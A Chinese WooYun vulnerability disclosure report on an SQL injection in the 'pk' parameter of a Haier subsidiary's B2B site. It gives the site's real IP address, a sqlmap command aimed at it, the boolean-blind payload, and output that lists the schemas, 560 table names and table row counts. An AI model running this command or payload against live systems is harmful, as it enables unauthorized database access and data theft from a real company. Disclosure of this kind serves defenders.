漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-046114
漏洞标题:海尔某分站官网存在SQL注射漏洞可造成信息泄露
相关厂商:海尔集团
漏洞作者: sun
提交时间:2013-12-20 18:21
修复时间:2013-12-25 18:22
公开时间:2013-12-25 18:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-20: 细节已通知厂商并且等待厂商处理中
2013-12-25: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
海尔某分站官网存在SQL注射漏洞可造成信息泄露
详细说明:
http://218.58.70.195 海尔旗下日日顺B2B官网
看数据说话,pk参数有问题
sqlmap.py -u "http://218.58.70.195/notice/noticeDetail?pk=8796158664513" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: pk
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pk=8796158664513) AND 1734=1734 AND (3188=3188
---
[14:27:08] [INFO] the back-end DBMS is Oracle
web application technology: Apache 2.4.6, JSP
back-end DBMS: Oracle
[14:27:08] [INFO] fetching current user
[14:27:08] [INFO] resumed: HYBRIS
current user: 'HYBRIS'
[14:27:08] [INFO] fetching current database
[14:27:08] [INFO] resumed: HYBRIS
current schema (equivalent to database on Oracle): 'HYBRIS'
[14:27:08] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[14:27:08] [INFO] fetching database (schema) names
[14:27:08] [INFO] fetching number of databases
[14:27:08] [INFO] resumed: 19
[14:27:09] [INFO] resumed: APEX_030200
[14:27:09] [INFO] resumed: APPQOSSYS
[14:27:09] [INFO] resumed: CTXSYS
[14:27:09] [INFO] resumed: DBSNMP
[14:27:09] [INFO] resumed: EXFSYS
[14:27:09] [INFO] resumed: FLOWS_FILES
[14:27:09] [INFO] resumed: HYBRIS
[14:27:09] [INFO] resumed: MDSYS
[14:27:09] [INFO] resumed: OLAPSYS
[14:27:09] [INFO] resumed: ORDDATA
[14:27:09] [INFO] resumed: ORDSYS
[14:27:09] [INFO] resumed: OUTLN
[14:27:09] [INFO] resumed: OWBSYS
[14:27:09] [INFO] resumed: SCOTT
[14:27:09] [INFO] resumed: SYS
[14:27:09] [INFO] resumed: SYSMAN
[14:27:09] [INFO] resumed: SYSTEM
[14:27:09] [INFO] resumed: WMSYS
[14:27:09] [INFO] resumed: XDB
available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HYBRIS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
560张表啊
Database: HYBRIS
[560 tables]
+--------------------------------+
| ABSTRACTLINKENTRIES |
| ABSTRACTLINKENTRIESLP |
| ACLENTRIES |
| ADDRESSES |
| ADDRESSPROPS |
| AGENT2BASESTORE |
| AGREEMENTS |
| APPLRESTRTYP4PGTYP |
| ASSIGNGRACTIONGRREL |
| ATOMICTYPES |
| ATOMICTYPESLP |
| ATTR2VALUEREL |
| ATTRIBUTECONFIGURATIONS |
| ATTRIBUTEDESCRIPTORS |
| ATTRIBUTEDESCRIPTORSLP |
| B2BBOOKINGLINEENTRY |
| B2BBUDGETS |
| B2BBUDGETSLP |
| B2BCOMMENT |
| B2BCOSTCENTERS |
| B2BCOSTCENTERSLP |
| B2BCREDITCHECKRESULT |
| B2BCREDITCHECKRESULTLP |
| B2BCREDITLIMIT |
| B2BGROUPS2PERMISSIONSREL |
| B2BMERCHANTCHECK |
| B2BMERCHANTCHECKRESULT |
| B2BMERCHANTCHECKRESULTLP |
| B2BPERMISSIONRESULTS |
| B2BPERMISSIONRESULTSLP |
| B2BPERMISSIONS |
| B2BPERMISSIONSLP |
| B2BQUOTELIMIT |
| B2BREPORTINGENTRIES |
| B2BREPORTINGSET |
| B2BUNIT2PRODUCTRELATION |
| BASESTORE |
| BASESTORE2COUNTRYREL |
| BASESTORE2CURRENCYREL |
| BASESTORE2LANGUAGEREL |
| BASESTORE2WAREHOUSEREL |
| BASESTORELP |
| BTGCONDITIONS |
| BTGCONFIGS |
| BTGOPERANDS |
| BTGOPERATORS |
| BTGREFOPTOCATEGORIES |
| BTGREFOPTOCOUNTRIES |
| BTGREFOPTOPAGES |
| BTGREFOPTOPRINCGROUPS |
| BTGREFOPTOPRODUCTS |
| BTGRESULT |
| BTGRULES |
| BTGRULESLP |
| BTGSEGMENTS |
| BUDGETS2COSTCENTER |
| CARTENTRIES |
| CARTS |
| CAT2ATTRREL |
| CAT2ATTRRELLP |
| CAT2CATREL |
| CAT2KEYWORDREL |
| CAT2MEDREL |
| CAT2PRINCREL |
| CAT2PRODREL |
| CATALOGS |
| CATALOGS4BASESTORES |
| CATALOGS4RESTRICTION |
| CATALOGS4SITE |
| CATALOGSLP |
| CATALOGVERSIONS |
| CATALOGVERSIONSLP |
| CATALOGVERSIONSYNCJOB |
| CATEGORIES |
| CATEGORIES4RESTRICTION |
| CATEGORIESLP |
| CATVERDIFFS |
| CCPAYSUBVALIDATION |
| CHANGEDESCRIPTORS |
| CLASSATTRVALUES |
| CLASSATTRVALUESLP |
| CLASSIFICATIONATTRS |
| CLASSIFICATIONATTRSLP |
| CLATTRUNT |
| CLATTRUNTLP |
| CMPTYPE2COVGRPRELS |
| CMSCOMPONENT |
| CMSCOMPONENTLP |
| CMSLINKSFORNAVNODES |
| CMSNAVIGATIONENTRY |
| CMSNAVIGATIONNODE |
| CMSNAVIGATIONNODELP |
| CMSPAGE |
| CMSPAGELP |
| CMSPAGESFORNAVNODES |
| CMSPREVIEWTICKET |
| CMSSITE |
| CMSSITELP |
| COCKPITCOLLECTIONS |
| COCKPITCOLLECTIONSLP |
| COCKPITCOLLELEMENTS |
| COCKPITCOLLITEMREFS |
| COCKPITCOMPACCESSRIGHTS |
| COCKPITCOMPCONFIGS |
| COCKPITITEMTEMPLATES |
| COCKPITITEMTEMPLATESLP |
| COCKPITSAVEDFACVALUES |
| COCKPITSAVEDPARAMVALS |
| COCKPITSAVEDQUERIES |
| COCKPITSAVEDQUERIESLP |
| COCKPITSAVEDSORTCRITS |
| COCKPITTEMPLCLASSIFRELS |
| COLLECTIONTYPES |
| COLLECTIONTYPESLP |
| COMMENTASSIGNRELATIONS |
| COMMENTATTACHMENTS |
| COMMENTCOMPCREATERELS |
| COMMENTCOMPONENTS |
| COMMENTCOMPREADRELS |
| COMMENTCOMPREMOVERELS |
| COMMENTCOMPWRITERELS |
| COMMENTDOMAINS |
| COMMENTITEMRELATIONS |
| COMMENTMETADATAS |
| COMMENTS |
| COMMENTTYPES |
| COMMENTUSERSETTINGS |
| COMMENTWATCHRELATIONS |
| COMPONENTTYPEGRP |
| COMPONENTTYPEGRPLP |
| COMPONENTTYPESFORSITE |
| COMPONENTTYPESFORSLOTS |
| COMPOSEDINDEXDTYPES |
| COMPOSEDTYPES |
| COMPOSEDTYPESLP |
| COMPOSITEENTRIES |
| COMPTYPEGRP2COMPTYPE |
| CONFIGITEMS |
| CONSIGNMENTENTRIES |
| CONSIGNMENTS |
| CONSTRAINTGROUP |
| CONTENTSLOT |
| CONTENTSLOTNAME |
| COUNTRIES |
| COUNTRIESLP |
| CRONJOBS |
| CRONJOBSLP |
| CSAGENTGROUP2BASESTORE |
| CSCHANGEEVENTENTRY |
| CSTICKETEMAIL |
| CSTICKETEVENTEMAILCONFIG |
| CSTICKETS |
| CSTRGR2ABSCSTRREL |
| CURRENCIES |
| CURRENCIESLP |
| CUSTOMERREVIEWS |
| CUSTOMERS2PERMISSIONS |
| DELIVERYMODES |
| DELIVERYMODESLP |
| DERIVEDMEDIAS |
| DISCOUNTROWS |
| DISCOUNTS |
| DISCOUNTSLP |
| ELEMENTS4CONTAINER |
| ELEMENTS4SLOTS |
| EMAILADDRESS |
| EMAILMESSAGE |
| EMAILMSG2BCCADDRREL |
| EMAILMSG2CCADDRREL |
| EMAILMSG2TOADDRREL |
| EMPL2APPRGRPSREL |
| EMPL2APPRSREL |
| EMPL2PERMGRPSREL |
| ENUMERATIONVALUES |
| ENUMERATIONVALUESLP |
| ETL_BDM_ONESELF_PRACTICAL |
| ETL_MDM_GOODSBASE |
| ETL_OMS_CUSGBNUM |
| EXPORTDATAHISTORYENTRY |
| FACETSEARCHCONF |
| FACSEARCHCONFCATVERREL |
| FACSEARCHCONFCURRREL |
| FACSEARCHCONFLANGREL |
| FORMAT |
| FORMATLP |
| FRAUDREPORTS |
| FRAUDSYMPTOMSCORING |
| GENERICITEMS |
| GENERICITEMSLP |
| GENTESTITEMS |
| GLOBALDISCOUNTROWS |
| GROUPS4RESTRICTION |
| HISTORYDOCREL |
| HMCHISTORYENTRIES |
| IHS_CATCENTER |
| INDEXCONFIGURATIONS |
| INDEXTESTITEM |
| INDEXTYPEREL |
| INDEXUPDATES |
| INF_HRMDMDICT |
| INF_YJCUSTOMER |
| ITEMCOCKPITTEMPLRELS |
| ITEMSYNCTIMESTAMPS |
| JALOTRANSLATORCONFIG |
| JOBLOGS |
| JOBS |
| JOBSEARCHRESTRICTION |
| JOBSLP |
| KEYWORDS |
| LANGCFGS |
| LANGUAGES |
| LANGUAGESLP |
| LFB2BMENUS |
| LFINFOBASE |
| LFMENUS |
| LFMKT |
| LFMKTCAT |
| LFORDERWEEK |
| LFROLEMENUS |
| LFROLES |
| LFSYSPARAM |
| LFUSER |
| LFUSERCAT |
| LFUSERMKT |
| LFUSERROLE |
| LFUSERYJMFID |
| LF_CRUD_METADATA |
| LF_GATELOCK |
| LF_NOTEBACK |
| LF_NOTEINFO |
| LF_NOTEINFOROLE |
| LF_NOTELOG |
| LF_NOTETYPE |
| LF_NOTETYPEROLE |
| LF_REPORT_SQL |
| LF_SEQUENCE |
| LF_SYSBASE |
| LF_TIMERTASK |
| LF_TIMERTASK_LOG |
| LF_TIMERTASK_LOGDETAIL |
| LF_WEB_BEANS |
| LINKS |
| LUCENEINDEXES |
| LUCENEINDEXESLP |
| MAPTYPES |
| MAPTYPESLP |
| MEDIACONTAINER |
| MEDIACONTAINERLP |
| MEDIACONTEXT |
| MEDIACONTEXTLP |
| MEDIAFOLDERS |
| MEDIAFORMAT |
| MEDIAFORMATLP |
| MEDIAFORMATMAPPING |
| MEDIAPROPS |
| MEDIAS |
| MEDIASLP |
| METAINFORMATIONS |
| NUMBERSERIES |
| ONLINEPRODUCT |
| OPENINGDAYS |
| OPENINGDAYSLP |
| OPENINGSCHEDULES |
| OPENINGSCHEDULESLP |
| ORDER2EXHTDAPPRSREL |
| ORDERCANCELCONFIGS |
| ORDERDISCRELS |
| ORDERENTMODRECENTRS |
| ORDERENTRIES |
| ORDERENTRYCONSUMED |
| ORDERENTRYPROPS |
| ORDERHISTORYENTRIES |
| ORDERMODIFIRECENTRS |
| ORDERMODIFIRECORDS |
| ORDERPROPS |
| ORDERS |
| ORGANIZATIONORDERSTATS |
| PAGETEMPLATE |
| PAGETYPESFORTEMPLATES |
| PARSERPROPERTY |
| PAYMENTINFOS |
| PAYMENTMODES |
| PAYMENTMODESLP |
| PAYMENTTRANSACTIONS |
| PAYMNTTRNSCTENTRIES |
| PCP2WRTBLECVREL |
| PCPL2RDBLECVREL |
| PENDINGSTEPSRELATION |
| PGRELS |
| POINTOFSERVICE |
| POINTOFSERVICELP |
| POS2WAREHOUSEREL |
| PREVIEWDATA |
| PRICEROWS |
| PRINCIPCOCKPITREADRELS |
| PRINCIPCOCKPITWRITERELS |
| PRINCTOLINKRELATIONS |
| PROCESSEDSTEPSRELATION |
| PROCESSES |
| PROCESSPARAMETERS |
| PROD2KEYWORDREL |
| PROD2PRINTREL |
| PRODUCTDELIMODEREL |
| PRODUCTFEATURES |
| PRODUCTORDERLIMITS |
| PRODUCTPROPS |
| PRODUCTREFERENCES |
| PRODUCTREFERENCESLP |
| PRODUCTS |
| PRODUCTS4RESTRICTION |
| PRODUCTSLP |
| PRODUCTTAXCODES |
| PRODUCTVENDORREL |
| PROMOTION |
| PROMOTIONACTION |
| PROMOTIONGROUP |
| PROMOTIONLP |
| PROMOTIONPRICEROW |
| PROMOTIONRELATION |
| PROMOTIONRESTRICTION |
| PROMOTIONRESTRICTIONLP |
| PROMOTIONRESULT |
| PROPS |
| QUANTITYANDPRICESROW |
| READCOCKPITCOLLRELS |
| READSAVEDQUERYRELS |
| REGIONS |
| REGIONSLP |
| RENDERERSPROPERTY |
| RENDERERTEMPLATE |
| RENDERERTEMPLATELP |
| RESTRICTION |
| RESTRICTION4PAGES |
| RESTRICTIONS |
| RESTRICTIONS4COMPS |
| RESTRICTIONSLP |
| RETURNENTRY |
| RETURNREQUEST |
| RRSFUKUANCRM |
| RRSNOTICE |
| RRSRECEIPT |
| SAVEDVALUEENTRY |
| SAVEDVALUES |
| SEARCHRESTRICTIONS |
| SEARCHRESTRICTIONSLP |
| SEGMENT2SITE |
| SLACTIONS |
| SLOTSFORPAGE |
| SLOTSFORTEMPLATE |
| SLRCNF2VALRNGSETREL |
| SLRIDPRP2VALRNSTREL |
| SOLRABSKWRDREDIR |
| SOLRENDPOINTURL |
| SOLRINDEXCONFIG |
| SOLRINDEXEDCORESRECORD |
| SOLRINDEXEDPROPERTY |
| SOLRINDEXEDPROPERTYLP |
| SOLRINDEXEDTYPE |
| SOLRINDEXERQUERY |
| SOLRINDEXERQUERYPARAM |
| SOLRINDEXOPERATIONRECORD |
| SOLRKEYWREDIRECTS |
| SOLRQUERYAGGREGATEDSTATS |
| SOLRSEARCHCONFIG |
| SOLRSERVERCONFIG |
| SOLRSORT |
| SOLRSORTFIELD |
| SOLRSORTLP |
| SOLRSTOPWORD |
| SOLRSYNONYMCONFIG |
| SOLRVALUERANGE |
| SOLRVALUERANGESET |
| STEPS |
| STOCKLEVELHISTORYENTRY |
| STOCKLEVELS |
| STOCKLEVPRODUCTREL |
| STORELOCATION2LOCATOR |
| STORELOCATORFEATURE |
| STORELOCATORFEATURELP |
| STORES4SITE |
| SYNATTCFG |
| SYNCJOB2LANGREL |
| SYNCJOB2PCPLREL |
| SYNCJOB2TYPEREL |
| SYSTEMINIT |
| TASKCONDITIONS |
| TASKLOGS |
| TASKS |
| TAXES |
| TAXESLP |
| TAXROWS |
| TESTITEM |
| TESTITEMLP |
| TITLES |
| TITLESLP |
| TRIGGERSCJ |
| T_LF_GOODSBASE_EXT |
| T_LF_GOODSBASE_EXT_ZF |
| T_LF_GOODSCAT |
| T_LF_IHS_BUDGET |
| T_LF_IHS_BUILDLIST |
| T_LF_IHS_BUILDREQ |
| T_LF_IHS_CARPACKAGE |
| T_LF_IHS_CATITEMS |
| T_LF_IHS_CATORDERWEEK |
| T_LF_IHS_CGORDERSTATUS |
| T_LF_IHS_CUSTOMERCREDIT |
| T_LF_IHS_GOODSRETURN |
| T_LF_IHS_JDSHOPCAR |
| T_LF_IHS_ORDERTMP |
| T_LF_IHS_SENDCENTER |
| T_LF_IHS_SENDTO |
| T_LF_IHS_SENDTOPACKAGE |
| T_LF_OMS_CUSGBNUM |
| T_LF_ONESELF_PRACTICAL |
| T_LF_PRODSALE |
| T_LF_PROD_SAMPLE |
| T_LF_STORE_AGE |
| T_LF_STORE_ZZTS |
| T_LF_SYSPARAM |
| T_LF_ZRFC_COS_TKNUM |
| T_PRINT_MANAGER |
| T_WL_ADDRESS |
| T_WL_ADDRESS_BAK |
| T_WL_AREA |
| T_WL_ATP_GROUP |
| T_WL_BANK |
| T_WL_BCM_ROLE |
| T_WL_BCM_USER |
| T_WL_BILLRETURN |
| T_WL_BOOK_TEMPLATE |
| T_WL_BUDGET_INFO |
| T_WL_BUDGET_TYPE |
| T_WL_CONTRACTRATE |
| T_WL_CRM_ORDER_ATP_MASTER_LOG |
| T_WL_CRM_ORDER_DETAIL_LOG |
| T_WL_CRM_ORDER_MASTER_LOG |
| T_WL_CRM_ORDER_OMS_MASTER_LOG |
| T_WL_CUSACCASS |
| T_WL_CUSACCVOUCH |
| T_WL_CUSTOMERBILL |
| T_WL_CUST_PRODUCT |
| T_WL_CUST_PRODUCT_BOOK |
| T_WL_CUST_SUB_COMPANY |
| T_WL_DISTRIBUTION_RELATION |
| T_WL_FND_MTL_PRODUCTGRP |
| T_WL_GENERATE_RECHARGE_ORDID |
| T_WL_GVS_NOVALUE |
| T_WL_HM_VALUE_SET |
| T_WL_HRACCASS |
| T_WL_HRACCVOUCH |
| T_WL_INFO_PAYEE_UNIT |
| T_WL_INFO_SOCIAL_COMPANY |
| T_WL_INVOICE_GVS_MAIN |
| T_WL_INVOICE_GVS_SIGN |
| T_WL_INVOICE_GVS_SUB |
| T_WL_INVOICE_JDE_MAIN |
| T_WL_INVOICE_JDE_SIGN |
| T_WL_INVOICE_RETURN |
| T_WL_KEHUQIANYUE |
| T_WL_MEMBER |
| T_WL_M_IN_P_B_VIEW |
| T_WL_NUMBER_MASTER |
| T_WL_ORDER_BASE_INFO |
| T_WL_ORDER_HEADER |
| T_WL_ORDER_HEADER_BAK |
| T_WL_ORDER_LINE |
| T_WL_ORDER_LINE_BAK |
| T_WL_ORDER_PRODUCT_REPORT |
| T_WL_ORDER_UNDETERMINE |
| T_WL_ORGANIZATION |
| T_WL_OUTBOND_DETAIL_SR |
| T_WL_OUTBOUND_HEADER |
| T_WL_OUTBOUND_LINE |
| T_WL_OUTBOUND_SIGN |
| T_WL_OUTBOUND_STATUS |
| T_WL_OVERDUE_DETAIL |
| T_WL_OVERDUE_MASTER |
| T_WL_PAYMENT_CLAUSE |
| T_WL_PAYMENT_JDE_POST |
| T_WL_PAYMENT_POST |
| T_WL_PICK_SAMPLE |
| T_WL_POS_TERMINAL |
| T_WL_PRINTTZ_DETAIL |
| T_WL_PRINTTZ_MASTER |
| T_WL_PRINTTZ_PRIZEMONEY |
| T_WL_PRODUCTNO_STATE |
| T_WL_PURCHASE_SAMPLE |
| T_WL_REBATE_DETAIL |
| T_WL_REBATE_MASTER |
| T_WL_RECEIPT_SUB |
| T_WL_RECEIPT_SUB_JDE |
| T_WL_RECHARGE |
| T_WL_RECHARGE_GENERATE_ORDID |
| T_WL_RECHARGE_KEEPUP_BOOKS |
| T_WL_REQUIREMENT_REPORT_LINE |
| T_WL_REQUIREMENT_REPORT_RESULT |
| T_WL_RETURN_APPLY |
| T_WL_RETURN_APPLY_TRACK |
| T_WL_SALEBATERATE |
| T_WL_SALEMONITOR |
| T_WL_SALEMONITOR_SUB |
| T_WL_SALE_SAMPLE |
| T_WL_SAMPLESTOCK |
| T_WL_SAMPLE_ALL |
| T_WL_SHORT_MESSAGE |
| T_WL_SIGNATUREINFO |
| T_WL_STORE_AGE |
| T_WL_STORE_ZZTS |
| T_WL_STRAIGHT_SCHEDULING_TIME |
| T_WL_TCSMESSAGE |
| T_WL_TCS_LOG_IN |
| T_WL_TCS_LOG_OUT |
| T_WL_TEST |
| T_WL_TRANSFER_APPLICATION |
| T_WL_USER |
| T_WL_WAREHOUSE |
| T_WL_WATERAPPLIANCES |
| UNIT2ACCTMGRGRPREL |
| UNIT2APPROVERGRPREL |
| UNIT2APPROVERSREL |
| UNITS |
| UNITSLP |
| USERGROUPPROPS |
| USERGROUPS |
| USERGROUPSLP |
| USERPROFILES |
| USERPROPS |
| USERRIGHTS |
| USERRIGHTSLP |
| USERS |
| USERS4RESTRICTION |
| VALIDATIONCONSTRAINTS |
| VALIDATIONCONSTRAINTSLP |
| VENDORS |
| VENDORSLP |
| VOUCHERINVALIDATIONS |
| V_BRAND_STATISTICS_SOCIAL |
| V_INVSORT_STATISTICS_HAIER |
| V_PROPORTION_STATISTICS |
| V_TRANSACTION_STATISTICS |
| WAREHOUSES |
| WAREHOUSESLP |
| WIDGETPARAMETER |
| WIDGETPREFERENCES |
| WIDGETPREFERENCESLP |
| WORKFLOWACTIONITEMSREL |
| WORKFLOWACTIONLINKREL |
| WORKFLOWACTIONS |
| WORKFLOWACTIONSLP |
| WORKFLOWACTIONSREL |
| WORKFLOWITEMATTS |
| WORKFLOWITEMATTSLP |
| WORKFLOWTEMPLATELINKREL |
| WORKFLOWTEMPLPRINCREL |
| WRITECOCKPITCOLLRELS |
| YDEPLOYMENTS |
| ZONE2COUNTRY |
| ZONEDELIVERYMODEVALUES |
| ZONES |
+--------------------------------+
截取部分
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pk
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pk=8796158664513) AND 1734=1734 AND (3188=3188
---
Database: HYBRIS
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| T_LF_STORE_ZZTS | 40705519 |
| T_LF_OMS_CUSGBNUM | 3096884 |
| T_WL_PRINTTZ_DETAIL | 2793686 |
| T_WL_PRINTTZ_MASTER | 1550195 |
| T_WL_PRINTTZ_PRIZEMONEY | 1436650 |
| B2BUNIT2PRODUCTRELATION | 1183744 |
未深入,从数量上看信息量很大。
漏洞证明:
已证明
修复方案:
厂商应该懂。
版权声明:转载请注明来源 sun@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-12-25 18:22
厂商回复:
最新状态:
暂无